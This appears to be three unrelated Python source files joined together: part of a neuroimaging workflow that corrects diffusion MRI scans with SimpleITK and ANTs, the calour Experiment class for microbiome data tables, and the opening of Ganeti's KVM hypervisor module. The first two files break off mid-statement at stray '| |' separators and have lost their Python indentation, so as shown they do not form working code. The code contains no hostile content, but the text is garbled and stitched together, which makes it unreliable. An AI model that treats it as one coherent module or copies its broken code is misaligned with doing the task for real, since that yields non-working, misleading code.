dilateFilter.SetKernelRadius(12)
dilated_mask = dilateFilter.Execute(label_mask)
regMask = dilated_mask
registrationMask = os.path.realpath("registrationMask.nrrd")
sitk.WriteImage(regMask, registrationMask)
return registrationMask
# Save direction cosine for the input volume
def save_direction_cosine_to_matrix(inputVolume):
"""
This function will return the direction cosine for the input volume
:param inputVolume:
:return:
"""
import os
import SimpleITK as sitk
assert os.path.exists(inputVolume), "File not found: %s" % inputVolume
t2 = sitk.ReadImage(inputVolume)
directionCosine = t2.GetDirection()
return directionCosine
def make_force_dc_file_list(inputB0, inputT2, inputLabelMap):
"""
This function will
:param inputB0:
:param inputT2:
:param inputLabelMap:
:return:
"""
import os
assert os.path.exists(inputB0), "File not found: %s" % inputB0
assert os.path.exists(inputT2), "File not found: %s" % inputT2
assert os.path.exists(inputLabelMap), "File not found: %s" % inputLabelMap
imagesList = [inputB0, inputT2, inputLabelMap]
return imagesList
# Force DC to ID
def force_dc_to_id(inputVolume):
"""
This function will force DC to ID
:param inputVolume:
:return:
"""
import os
import SimpleITK as sitk
inImage = sitk.ReadImage(inputVolume)
inImage.SetDirection((1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0))
outputVolume = os.path.realpath("IDDC_" + os.path.basename(inputVolume))
sitk.WriteImage(inImage, outputVolume)
return outputVolume
def restore_dc_from_saved_matrix(inputVolume, inputDirectionCosine):
"""
This function will
:param inputVolume:
:param inputDirectionCosine:
:return:
"""
import os
import SimpleITK as sitk
inImage = sitk.ReadImage(inputVolume)
inImage.SetDirection(inputDirectionCosine)
outputVolume = os.path.realpath("CorrectedDWI.nrrd")
sitk.WriteImage(inImage, outputVolume)
return outputVolume
def get_rigid_transform_inverse(inputTransform):
"""
This function will
:param inputTransform:
:return:
"""
import os
import SimpleITK as sitk
inputTx = sitk.ReadTransform(inputTransform)
versorRigidTx = sitk.VersorRigid3DTransform()
versorRigidTx.SetFixedParameters(inputTx.GetFixedParameters())
versorRigidTx.SetParameters(inputTx.GetParameters())
invTx = versorRigidTx.GetInverse()
inverseTransform = os.path.realpath(
"Inverse_" + os.path.basename(inputTransform)
)
sitk.WriteTransform(invTx, inverseTransform)
return inverseTransform
#################################
# \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
CorrectionWF = pe.Workflow(name=WFname)
inputsSpec = pe.Node(
interface=IdentityInterface(fields=["T2Volume", "DWIVolume", "LabelMapVolume"]),
name="inputsSpec",
)
outputsSpec = pe.Node(
interface=IdentityInterface(
fields=["CorrectedDWI", "CorrectedDWI_in_T2Space", "DWIBrainMask"]
),
name="outputsSpec",
)
# Step0: remove the skull from the T2 volume
ExtractBRAINFromHeadNode = pe.Node(
interface=Function(
function=extract_brain_from_head,
input_names=["RawScan", "BrainLabels"],
output_names=["outputVolume"],
),
name="extract_brain_from_head",
)
CorrectionWF.connect(inputsSpec, "T2Volume", ExtractBRAINFromHeadNode, "RawScan")
CorrectionWF.connect(
inputsSpec, "LabelMapVolume", ExtractBRAINFromHeadNode, "BrainLabels"
)
# Step1: extract B0 from DWI volume
EXTRACT_B0 = pe.Node(interface=extractNrrdVectorIndex(), name="EXTRACT_B0")
EXTRACT_B0.inputs.vectorIndex = 0
EXTRACT_B0.inputs.outputVolume = "B0_Image.nrrd"
CorrectionWF.connect(inputsSpec, "DWIVolume", EXTRACT_B0, "inputVolume")
# Step2: Register T2 to B0 space using BRAINSFit
BFit_T2toB0 = pe.Node(interface=BRAINSFit(), name="BFit_T2toB0")
BFit_T2toB0.inputs.costMetric = "MMI"
BFit_T2toB0.inputs.numberOfSamples = 100000
BFit_T2toB0.inputs.numberOfIterations = [1500]
BFit_T2toB0.inputs.numberOfHistogramBins = 50
BFit_T2toB0.inputs.maximumStepLength = 0.2
BFit_T2toB0.inputs.minimumStepLength = [0.00005]
BFit_T2toB0.inputs.useRigid = True
BFit_T2toB0.inputs.useAffine = True
BFit_T2toB0.inputs.maskInferiorCutOffFromCenter = 65
BFit_T2toB0.inputs.maskProcessingMode = "ROIAUTO"
BFit_T2toB0.inputs.ROIAutoDilateSize = 13
BFit_T2toB0.inputs.backgroundFillValue = 0.0
BFit_T2toB0.inputs.initializeTransformMode = "useCenterOfHeadAlign"
BFit_T2toB0.inputs.strippedOutputTransform = "T2ToB0_RigidTransform.h5"
BFit_T2toB0.inputs.writeOutputTransformInFloat = True
CorrectionWF.connect(EXTRACT_B0, "outputVolume", BFit_T2toB0, "fixedVolume")
CorrectionWF.connect(
ExtractBRAINFromHeadNode, "outputVolume", BFit_T2toB0, "movingVolume"
)
# Step3: Use T_rigid to "resample" T2 and label map images to B0 image space
MakeResamplerInFilesListNode = pe.Node(
Function(
function=make_resampled_in_file_list,
input_names=["inputT2", "inputLabelMap"],
output_names=["imagesList"],
),
name="MakeResamplerInFilesListNode",
)
CorrectionWF.connect(
[
(
ExtractBRAINFromHeadNode,
MakeResamplerInFilesListNode,
[("outputVolume", "inputT2")],
),
(
inputsSpec,
MakeResamplerInFilesListNode,
[("LabelMapVolume", "inputLabelMap")],
),
]
)
ResampleToB0Space = pe.MapNode(
interface=BRAINSResample(),
name="ResampleToB0Space",
iterfield=["inputVolume", "pixelType", "outputVolume"],
)
ResampleToB0Space.inputs.interpolationMode = "Linear"
ResampleToB0Space.inputs.outputVolume = ["T2toB0.nrrd", "BRAINMaskToB0.nrrd"]
ResampleToB0Space.inputs.pixelType = ["ushort", "binary"]
CorrectionWF.connect(
BFit_T2toB0, "strippedOutputTransform", ResampleToB0Space, "warpTransform"
)
CorrectionWF.connect(
EXTRACT_B0, "outputVolume", ResampleToB0Space, "referenceVolume"
)
CorrectionWF.connect(
MakeResamplerInFilesListNode, "imagesList", ResampleToB0Space, "inputVolume"
)
# Step4: Create registration mask from resampled label map image
CreateRegistrationMask = pe.Node(
interface=Function(
function=create_ants_registration_mask,
input_names=["brainMask"],
output_names=["registrationMask"],
),
name="create_ants_registration_mask",
)
CorrectionWF.connect(
ResampleToB0Space,
("outputVolume", pick_from_file, 1),
CreateRegistrationMask,
"brainMask",
)
# Step5: Save direction cosine for the resampled T2 image
SaveDirectionCosineToMatrixNode = pe.Node(
interface=Function(
function=save_direction_cosine_to_matrix,
input_names=["inputVolume"],
output_names=["directionCosine"],
),
name="save_direction_cosine_to_matrix",
)
CorrectionWF.connect(
ResampleToB0Space,
("outputVolume", pick_from_file, 0),
SaveDirectionCosineToMatrixNode,
"inputVolume",
)
# Step6: Force DC to ID
MakeForceDCFilesListNode = pe.Node(
Function(
function=make_force_dc_file_list,
input_names=["inputB0", "inputT2", "inputLabelMap"],
output_names=["imagesList"],
),
name="MakeForceDCFilesListNode",
)
CorrectionWF.connect(
[
(EXTRACT_B0, MakeForceDCFilesListNode, [("outputVolume", "inputB0")]),
(
ResampleToB0Space,
MakeForceDCFilesListNode,
[(("outputVolume", pick_from_file, 0), "inputT2")],
),
(
CreateRegistrationMask,
MakeForceDCFilesListNode,
[("registrationMask", "inputLabelMap")],
),
]
)
ForceDCtoIDNode = pe.MapNode(
interface=Function(
function=force_dc_to_id,
input_names=["inputVolume"],
output_names=["outputVolume"],
),
name="force_dc_to_id",
iterfield=["inputVolume"],
)
CorrectionWF.connect(
MakeForceDCFilesListNode, "imagesList", ForceDCtoIDNode, "inputVolume"
)
# Step7: Run antsRegistration in one direction
antsReg_B0ToTransformedT2 = pe.Node(
interface=ants.Registration(), name="antsReg_B0ToTransformedT2"
)
antsReg_B0ToTransformedT2.inputs.interpolation = "Linear"
antsReg_B0ToTransformedT2.inputs.dimension = 3
antsReg_B0ToTransformedT2.inputs.transforms = ["SyN"]
antsReg_B0ToTransformedT2.inputs.transform_parameters = [(0.25, 3.0, 0.0)]
antsReg_B0ToTransformedT2.inputs.metric = ["MI"]
antsReg_B0ToTransformedT2.inputs.sampling_strategy = [None]
antsReg_B0ToTransformedT2.inputs.sampling_percentage = [1.0]
antsReg_B0ToTransformedT2.inputs.metric_weight = [1.0]
antsReg_B0ToTransformedT2.inputs.radius_or_number_of_bins = [32]
antsReg_B0ToTransformedT2.inputs.number_of_iterations = [[70, 50, 40]]
antsReg_B0ToTransformedT2.inputs.convergence_threshold = [1e-6]
antsReg_B0ToTransformedT2.inputs.convergence_window_size = [10]
antsReg_B0ToTransformedT2.inputs.use_histogram_matching = [True]
antsReg_B0ToTransformedT2.inputs.shrink_factors = [[3, 2, 1]]
antsReg_B0ToTransformedT2.inputs.smoothing_sigmas = [[2, 1, 0]]
antsReg_B0ToTransformedT2.inputs.sigma_units = ["vox"]
antsReg_B0ToTransformedT2.inputs.use_estimate_learning_rate_once = [False]
antsReg_B0ToTransformedT2.inputs.write_composite_transform = True
antsReg_B0ToTransformedT2.inputs.collapse_output_transforms = False
antsReg_B0ToTransformedT2.inputs.initialize_transforms_per_stage = False
antsReg_B0ToTransformedT2.inputs.output_transform_prefix = "Tsyn"
antsReg_B0ToTransformedT2.inputs.winsorize_lower_quantile = 0.01
antsReg_B0ToTransformedT2.inputs.winsorize_upper_quantile = 0.99
antsReg_B0ToTransformedT2.inputs.float = True
antsReg_B0ToTransformedT2.inputs.num_threads = -1
antsReg_B0ToTransformedT2.inputs.args = "--restrict-deformation 0x1x0"
CorrectionWF.connect(
ForceDCtoIDNode,
("outputVolume", pick_from_file, 1),
antsReg_B0ToTransformedT2,
"fixed_image",
)
CorrectionWF.connect(
ForceDCtoIDNode,
("outputVolume", pick_from_file, 2),
antsReg_B0ToTransformedT2,
"fixed_image_masks",
)
CorrectionWF.connect(
ForceDCtoIDNode,
("outputVolume", pick_from_file, 0),
antsReg_B0ToTransformedT2,
"moving_image",
)
# Step8: Now, all necessary transforms are acquired. It's a time to
# transform input DWI image into T2 image space
# {DWI} --> force_dc_to_id --> gtractResampleDWIInPlace(using SyN transfrom)
# --> Restore DirectionCosine From Saved Matrix --> gtractResampleDWIInPlace(inverse of T_rigid from BFit)
# --> {CorrectedDW_in_T2Space}
DWI_ForceDCtoIDNode = pe.Node(
interface=Function(
function=force_dc_to_id,
input_names=["inputVolume"],
output_names=["outputVolume"],
),
name="DWI_ForceDCtoIDNode",
)
CorrectionWF.connect(inputsSpec, "DWIVolume", DWI_ForceDCtoIDNode, "inputVolume")
gtractResampleDWI_SyN = pe.Node(
interface=gtractResampleDWIInPlace(), name="gtractResampleDWI_SyN"
)
CorrectionWF.connect(
DWI_ForceDCtoIDNode, "outputVolume", gtractResampleDWI_SyN, "inputVolume"
)
CorrectionWF.connect(
antsReg_B0ToTransformedT2,
"composite_transform",
gtractResampleDWI_SyN,
"warpDWITransform",
)
CorrectionWF.connect(
ForceDCtoIDNode,
("outputVolume", pick_from_file, 1),
gtractResampleDWI_SyN,
"referenceVolume",
) # fixed image of antsRegistration
gtractResampleDWI_SyN.inputs.outputVolume = "IDDC_correctedDWI.nrrd"
RestoreDCFromSavedMatrixNode = pe.Node(
interface=Function(
function=restore_dc_from_saved_matrix,
input_names=["inputVolume", "inputDirectionCosine"],
output_names=["outputVolume"],
),
name="restore_dc_from_saved_matrix",
)
CorrectionWF.connect(
gtractResampleDWI_SyN,
"outputVolume",
RestoreDCFromSavedMatrixNode,
"inputVolume",
)
CorrectionWF.connect(
SaveDirectionCosineToMatrixNode,
"directionCosine",
RestoreDCFromSavedMatrixNode,
"inputDirectionCosine",
)
CorrectionWF.connect(
RestoreDCFromSavedMatrixNode, "outputVolume", outputsSpec, "CorrectedDWI"
)
GetRigidTransformInverseNode = pe.Node(
interface=Function(
function=get_rigid_transform_inverse,
input_names=["inputTransform"],
output_names=["inverseTransform"],
),
name="get_rigid_transform_inverse",
)
CorrectionWF.connect(
BFit_T2toB0,
"strippedOutputTransform",
GetRigidTransformInverseNode,
"inputTransform",
)
gtractResampleDWIInPlace_Trigid = pe.Node(
interface=gtractResampleDWIInPlace(), name="gtractResampleDWIInPlace_Trigid"
)
CorrectionWF.connect(
RestoreDCFromSavedMatrixNode,
"outputVolume",
gtractResampleDWIInPlace_Trigid,
"inputVolume",
)
CorrectionWF.connect(
GetRigidTransformInverseNode,
"inverseTransform",
gtractResampleDWIInPlace_Trigid,
"inputTransform",
) # Inverse of rigid transform from BFit
gtractResampleDWIInPlace_Trigid.inputs.outputVolume = (
"CorrectedDWI_in_T2Space_estimate.nrrd"
)
gtractResampleDWIInPlace_Trigid.inputs.outputResampledB0 = (
"CorrectedDWI_in_T2Space_estimate_B0.nrrd"
)
# Setp9: An extra registration step to tune the alignment between the CorrecetedDWI_in_T2Space image and T2 image.
BFit_TuneRegistration = pe.Node(interface=BRAINSFit(), name="BFit_TuneRegistration")
BFit_TuneRegistration.inputs.costMetric = "MMI"
BFit_TuneRegistration.inputs.numberOfSamples = 100000
BFit_TuneRegistration.inputs.numberOfIterations = [1500]
BFit_TuneRegistration.inputs.numberOfHistogramBins = 50
BFit_TuneRegistration.inputs.maximumStepLength = 0.2
BFit_TuneRegistration.inputs.minimumStepLength = [0.00005]
BFit_TuneRegistration.inputs.useRigid = True
BFit_TuneRegistration.inputs.useAffine = True
BFit_TuneRegistration.inputs.maskInferiorCutOffFromCenter = 65
BFit_TuneRegistration.inputs.maskProcessingMode = "ROIAUTO"
BFit_TuneRegistration.inputs.ROIAutoDilateSize = 13
BFit_TuneRegistration.inputs.backgroundFillValue = 0.0
BFit_TuneRegistration.inputs.initializeTransformMode = "useCenterOfHeadAlign"
BFit_TuneRegistration.inputs.strippedOutputTransform = (
"CorrectedB0inT2Space_to_T2_RigidTransform.h5"
)
BFit_TuneRegistration.inputs.writeOutputTransformInFloat = True
CorrectionWF.connect(
ExtractBRAINFromHeadNode, "outputVolume", BFit_TuneRegistration, "fixedVolume"
) # T2 brain volume
CorrectionWF.connect(
gtractResampleDWIInPlace_Trigid,
"outputResampledB0",
BFit_TuneRegistration,
"movingVolume",
) # CorrectedB0_in_T2Space
gtractResampleDWIInPlace_TuneRigidTx = pe.Node(
interface=gtractResampleDWIInPlace(),
name="gtractResampleDWIInPlace_TuneRigidTx",
)
CorrectionWF.connect(
gtractResampleDWIInPlace_Trigid,
"outputVolume",
gtractResampleDWIInPlace_TuneRigidTx,
"inputVolume",
)
CorrectionWF.connect(
BFit_TuneRegistration,
"strippedOutputTransform",
gtractResampleDWIInPlace_TuneRigidTx,
"inputTransform",
)
gtractResampleDWIInPlace_TuneRigidTx.inputs.outputVolume = (
"CorrectedDWI_in_T2Space.nrrd"
)
gtractResampleDWIInPlace_TuneRigidTx.inputs.outputResampledB0 = (
"CorrectedDWI_in_T2Space_B0.nrrd"
)
# Finally we pass the outputs of the gtractResampleDWIInPlace_TuneRigidTx to the outputsSpec
CorrectionWF.connect(
gtractResampleDWIInPlace_TuneRigidTx,
"outputVolume",
outputsSpec,
"CorrectedDWI_in_T2Space",
)
# Step10: Create brain mask from the input labelmap
DWIBRAINMASK = pe.Node(interface=BRAINSResample(), name="DWIBRAINMASK")
DWIBRAINMASK.inputs.interpolationMode = "Linear"
DWIBRAINMASK.inputs.outputVolume = | |
# <gh_stars>0  (repository-scrape artifact; commented out so the module parses)
'''
experiment (:mod:`calour.experiment`)
=====================================
.. currentmodule:: calour.experiment
Classes
^^^^^^^
.. autosummary::
:toctree: generated
Experiment
'''
# ----------------------------------------------------------------------------
# Copyright (c) 2016--, Calour development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from logging import getLogger
from copy import deepcopy, copy
from functools import wraps
import pandas as pd
import numpy as np
import scipy.sparse
logger = getLogger(__name__)
class Experiment:
'''This class contains the data for a experiment or a meta experiment.
The data set includes a data table (otu table, gene table,
metabolomic table, or all those tables combined), a sample
metadata table, and a feature metadata.
Parameters
----------
data : numpy.ndarray or scipy.sparse.csr_matrix
The abundance table for OTUs, metabolites, genes, etc. Samples
are in row and features in column
sample_metadata : pandas.DataFrame
The metadata on the samples
feature_metadata : pandas.DataFrame
The metadata on the features
description : str
name of experiment
sparse : bool
store the data array in :class:`scipy.sparse.csr_matrix`
or :class:`numpy.ndarray`
Attributes
----------
data : numpy.ndarray or scipy.sparse.csr_matrix
The abundance table for OTUs, metabolites, genes, etc. Samples
are in row and features in column
sample_metadata : pandas.DataFrame
The metadata on the samples
feature_metadata : pandas.DataFrame
The metadata on the features
exp_metadata : dict
metadata about the experiment (data md5, filenames, etc.)
shape : tuple of (int, int)
the dimension of data
sparse : bool
store the data array in :class:`scipy.sparse.csr_matrix`
or :class:`numpy.ndarray`
normalized : int
the normalization factor. it is zero if not normalized
description : str
name of the experiment
See Also
--------
AmpliconExperiment
'''
def __init__(self, data, sample_metadata, feature_metadata=None,
exp_metadata={}, description='', sparse=True):
self.data = data
self.sample_metadata = sample_metadata
self.feature_metadata = feature_metadata
self.exp_metadata = exp_metadata
self.description = description
self.normalized = 0
# the function calling history list
self._call_history = []
# whether to log to history
self._log = True
# flag if data array is sparse (True) or dense (False)
self.sparse = sparse
# the default databases to use for feature information
self.heatmap_databases = ()
    @property
    def sparse(self):
        '''bool: whether ``data`` is currently stored as a scipy sparse matrix.'''
        return scipy.sparse.issparse(self.data)
    @sparse.setter
    def sparse(self, sparse):
        # Convert the data array in place. Note the deliberate identity
        # checks: passing anything other than exactly True/False (e.g. None)
        # leaves the current storage format unchanged.
        if sparse is True and not scipy.sparse.issparse(self.data):
            self.data = scipy.sparse.csr_matrix(self.data)
        elif sparse is False and scipy.sparse.issparse(self.data):
            self.data = self.data.toarray()
def __repr__(self):
'''Return a string representation of this object.
The form is: class (description) with X samples, Y features
'''
l1 = self.__class__.__name__
if self.description:
l1 += ' ("%s")' % self.description
l1 += ' with %d samples, %d features' % self.data.shape
return l1
def __eq__(self, other):
'''Check equality.
It compares ``data``, ``sample_metadata``, and
``feature_metadata`` attributes. to check sparsity and do
the conversion if needed first.
'''
if self.sparse is True:
data = self.data.toarray()
else:
data = self.data
if other.sparse is True:
other_data = other.data.toarray()
else:
other_data = other.data
return (np.array_equal(data, other_data) and
pd.DataFrame.equals(self.feature_metadata, other.feature_metadata) and
pd.DataFrame.equals(self.sample_metadata, other.sample_metadata))
    def __ne__(self, other):
        '''Inverse of :meth:`__eq__`.'''
        return not (self == other)
def __getitem__(self, pos):
'''Get the abundance at (sampleid, featureid)
Parameters
----------
pos : tuple of (str, str)
the SampleID, FeatureID
Returns
-------
float
The abundance of feature ID in sample ID
'''
if not isinstance(pos, tuple) or len(pos) != 2:
raise SyntaxError('Must supply sample ID, feature ID')
sample = pos[0]
feature = pos[1]
if isinstance(sample, slice):
sample_pos = sample
else:
try:
sample_pos = self.sample_metadata.index.get_loc(sample)
except KeyError:
raise KeyError('SampleID %s not in experiment samples' % sample)
if isinstance(feature, slice):
feature_pos = feature
else:
try:
feature_pos = self.feature_metadata.index.get_loc(feature)
except KeyError:
raise KeyError('FeatureID %s not in experiment features' % feature)
if self.sparse:
dat = self.get_data(sparse=False)
else:
dat = self.get_data()
return dat[sample_pos, feature_pos]
    def copy(self):
        '''Copy the object (deeply).

        It calls :func:`Experiment.__deepcopy__` to make copy.

        Returns
        -------
        Experiment
            an independent deep copy of this experiment
        '''
        return deepcopy(self)
def __deepcopy__(self, memo):
'''Implement the deepcopy since pandas has problem deepcopy empty dataframe
When using the default deepcopy on an empty dataframe (columns but no rows), we get an error.
This happens when dataframe has 0 rows in pandas 0.19.2 np112py35_1.
So we manually use copy instead of deepcopy for empty dataframes
'''
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
for k, v in self.__dict__.items():
try:
setattr(result, k, deepcopy(v, memo))
except:
logger.debug('Failed to copy attribute %r, doing shallow copy on it' % k)
setattr(result, k, copy(v))
memo[id(k)] = v
return result
    @staticmethod
    def _record_sig(func):
        '''Decorator: record calls of ``func`` into the result's ``_call_history``.

        Note this requires the function decorated to return an
        :class:`.Experiment` object.
        '''
        fn = func.__qualname__
        @wraps(func)
        def inner(*args, **kwargs):
            # this extra code here is to prevent recording func call
            # if the method is called inside another method: the outermost
            # decorated call flips `_log` to False so nested decorated calls
            # do not also append to the history.
            exp = args[0]
            log = exp._log
            try:
                logger.debug('Run func {}'.format(fn))
                new_exp = func(*args, **kwargs)
                if exp._log is True:
                    # do not use `'%r' % i` because it causes error when i is a tuple
                    param = ['{!r}'.format(i) for i in args[1:]] + ['{0!s}={1!r}'.format(k, v) for k, v in kwargs.items()]
                    param = ', '.join(param)
                    new_exp._call_history.append('{0}({1})'.format(fn, param))
                    exp._log = False
                logger.debug('Current object: {}'.format(new_exp))
            finally:
                # set log status back (runs even when `func` raised)
                exp._log = log
            return new_exp
        return inner
def get_data(self, sparse=None, copy=False):
'''Get the data as a 2d array
Get the data 2d array (each column is a feature and row is a sample)
Parameters
----------
sparse : None or bool, optional
None (default) to pass original data (sparse or dense).
True to get as sparse. False to get as dense
copy : bool, optional
True to get a copy of the data; otherwise, it can be
the original data or a copy (default).
Returns
-------
``Experiment.data``
'''
if sparse is None:
if copy:
return self.data.copy()
else:
return self.data
elif sparse:
if self.sparse:
if copy:
return self.data.copy()
else:
return self.data
else:
return scipy.sparse.csr_matrix(self.data)
else:
if self.sparse:
return self.data.toarray()
else:
if copy:
return self.data.copy()
else:
return self.data
    @property
    def shape(self):
        '''tuple of (int, int): (number of samples, number of features).'''
        return self.data.shape
def reorder(self, new_order, axis=0, inplace=False):
'''Reorder according to indices in the new order.
Note that we can also drop samples in new order.
Parameters
----------
new_order : Iterable of int or boolean mask
the order of new indices
axis : 0, 1, 's', or 'f'
the axis where the reorder occurs. 0 or 's' means reodering samples;
1 or 'f' means reordering features.
inplace : bool, optional
reorder in place.
Returns
-------
Experiment
experiment with reordered samples
'''
if inplace is False:
exp = self.copy()
else:
exp = self
# make it a np array; otherwise the slicing won't work if the new_order is
# a list of boolean and data is sparse matrix. For example:
# from scipy.sparse import csr_matrix
# a = csr_matrix((3, 4), dtype=np.int8)
# In [125]: a[[False, False, False], :]
# Out[125]:
# <3x4 sparse matrix of type '<class 'numpy.int8'>'
# In [126]: a[np.array([False, False, False]), :]
# Out[126]:
# <0x4 sparse matrix of type '<class 'numpy.int8'>'
# if new_order is empty, we want to return empty experiment
# it doesn't work for dense data is we use np.array([]) for the indexing
if len(new_order) > 0:
new_order = np.array(new_order)
if axis == 0:
exp.data = exp.data[new_order, :]
exp.sample_metadata = exp.sample_metadata.iloc[new_order, :]
else:
exp.data = exp.data[:, new_order]
if exp.feature_metadata is not None:
exp.feature_metadata = exp.feature_metadata.iloc[new_order, :]
return exp
def to_pandas(self, sample_field=None, feature_field=None, sparse=None):
'''Get a pandas dataframe of the abundances
Samples are rows, features are columns. Can specify the metadata fields
for the index (default is sample_metadata index) and column labels
(default is feature_metadata index)
Parameters
----------
sample_field : str or None, optional
Name of the sample_metadata column to use for index.
None (default) is the sample_metadata index
feature_field : str or None, optional
Name of the feature_metadata column to use for column names.
None (default) is the feature_metadata index
sparse: bool or None, optional
None (default) to get sparsity based on the underlying Experiment sparsity
True to force to sparse pandas.Dataframe
False to force to standard pandas.Dataframe
Returns
-------
pandas.Dataframe or pandas.SparseDataFrame
'''
if sample_field is None:
ind = self.sample_metadata.index
else:
ind = self.sample_metadata[sample_field]
if feature_field is None:
cols = self.feature_metadata.index
else:
cols = self.feature_metadata[feature_field]
if sparse is not None:
self.sparse = | |
# lib/hypervisor/hv_kvm/__init__.py  (scrape artifact commented out so the module parses)
#
#
# Copyright (C) 2008, 2009, 2010, 2011, 2012, 2013, 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""KVM hypervisor
"""
import errno
import os
import os.path
import re
import tempfile
import time
import logging
import pwd
import shutil
import urllib.request, urllib.error, urllib.parse
from bitarray import bitarray
try:
import psutil # pylint: disable=F0401
if psutil.version_info < (2, 0, 0):
# The psutil version seems too old, we ignore it
psutil_err = \
"too old (2.x.x or newer needed, %s found)" % psutil.__version__
psutil = None
else:
psutil_err = "<no error>"
except ImportError:
psutil_err = "not found"
psutil = None
from ganeti import utils
from ganeti import constants
from ganeti import errors
from ganeti import serializer
from ganeti import objects
from ganeti import uidpool
from ganeti import ssconf
from ganeti import netutils
from ganeti import pathutils
from ganeti.hypervisor import hv_base
from ganeti.utils import wrapper as utils_wrapper
from ganeti.hypervisor.hv_kvm.monitor import QmpConnection, QmpMessage, \
MonitorSocket
from ganeti.hypervisor.hv_kvm.netdev import OpenTap
from ganeti.hypervisor.hv_kvm.validation import check_boot_parameters, \
check_console_parameters, \
check_disk_cache_parameters, \
check_security_model,\
check_spice_parameters, \
check_vnc_parameters, \
validate_machine_version, \
validate_security_model, \
validate_spice_parameters, \
validate_vnc_parameters
_KVM_NETWORK_SCRIPT = pathutils.CONF_DIR + "/kvm-vif-bridge"
_KVM_START_PAUSED_FLAG = "-S"
# below constants show the format of the runtime file
# the nics are in the second position, while the disks are in the 4th (last)
# moreover, disk entries are stored as a list of tuples
# (L{objects.Disk}, link_name, uri)
_KVM_NICS_RUNTIME_INDEX = 1
_KVM_DISKS_RUNTIME_INDEX = 3
_DEVICE_RUNTIME_INDEX = {
constants.HOTPLUG_TARGET_DISK: _KVM_DISKS_RUNTIME_INDEX,
constants.HOTPLUG_TARGET_NIC: _KVM_NICS_RUNTIME_INDEX
}
_FIND_RUNTIME_ENTRY = {
constants.HOTPLUG_TARGET_NIC:
lambda nic, kvm_nics: [n for n in kvm_nics if n.uuid == nic.uuid],
constants.HOTPLUG_TARGET_DISK:
lambda disk, kvm_disks: [(d, l, u) for (d, l, u) in kvm_disks
if d.uuid == disk.uuid]
}
_RUNTIME_DEVICE = {
constants.HOTPLUG_TARGET_NIC: lambda d: d,
constants.HOTPLUG_TARGET_DISK: lambda d_e_x: d_e_x[0]
}
_RUNTIME_ENTRY = {
constants.HOTPLUG_TARGET_NIC: lambda d, e: d,
constants.HOTPLUG_TARGET_DISK: lambda d, e: (d, e[0], e[1])
}
_DEVICE_TYPE = {
constants.HOTPLUG_TARGET_NIC: lambda hvp: hvp[constants.HV_NIC_TYPE],
constants.HOTPLUG_TARGET_DISK: lambda hvp: hvp[constants.HV_DISK_TYPE],
}
_DEVICE_DRIVER = {
constants.HOTPLUG_TARGET_NIC:
lambda ht: "virtio-net-pci" if ht == constants.HT_NIC_PARAVIRTUAL else ht,
constants.HOTPLUG_TARGET_DISK:
lambda ht: "virtio-blk-pci" if ht == constants.HT_DISK_PARAVIRTUAL else ht,
}
# NICs and paravirtual disks
# show up as devices on the PCI bus (one slot per device).
# SCSI disks will be placed on the SCSI bus.
_DEVICE_BUS = {
constants.HOTPLUG_TARGET_NIC:
lambda _: _PCI_BUS,
constants.HOTPLUG_TARGET_DISK:
lambda ht: _SCSI_BUS if ht in constants.HT_SCSI_DEVICE_TYPES else _PCI_BUS
}
_HOTPLUGGABLE_DEVICE_TYPES = {
# All available NIC types except for ne2k_isa
constants.HOTPLUG_TARGET_NIC: [
constants.HT_NIC_E1000,
constants.HT_NIC_I82551,
constants.HT_NIC_I8259ER,
constants.HT_NIC_I85557B,
constants.HT_NIC_NE2K_PCI,
constants.HT_NIC_PARAVIRTUAL,
constants.HT_NIC_PCNET,
constants.HT_NIC_RTL8139,
],
constants.HOTPLUG_TARGET_DISK: [
constants.HT_DISK_PARAVIRTUAL,
constants.HT_DISK_SCSI_BLOCK,
constants.HT_DISK_SCSI_GENERIC,
constants.HT_DISK_SCSI_HD,
constants.HT_DISK_SCSI_CD,
]
}
_PCI_BUS = "pci.0"
_SCSI_BUS = "scsi.0"
_MIGRATION_CAPS_DELIM = ":"
# in future make dirty_sync_count configurable
_POSTCOPY_SYNC_COUNT_THRESHOLD = 2 # Precopy passes before enabling postcopy
def _with_qmp(fn):
"""Wrapper used on hotplug related methods"""
def wrapper(self, *args, **kwargs):
"""Create a QmpConnection and run the wrapped method"""
if not getattr(self, "qmp", None):
for arg in args:
if isinstance(arg, objects.Instance):
instance = arg
break
else:
raise(RuntimeError("QMP decorator could not find"
" a valid ganeti instance object"))
filename = self._InstanceQmpMonitor(instance.name)# pylint: disable=W0212
self.qmp = QmpConnection(filename)
return fn(self, *args, **kwargs)
return wrapper
def _GetDriveURI(disk, link, uri):
  """Helper function to get the drive uri to be used in --drive kvm option

  Invoked during startup and disk hot-add. In the latter case, and if no
  userspace access mode is used, it will be overridden with
  /dev/fdset/<fdset-id> (see HotAddDisk() and AddFd() of QmpConnection).

  @type disk: L{objects.Disk}
  @param disk: A disk configuration object
  @type link: string
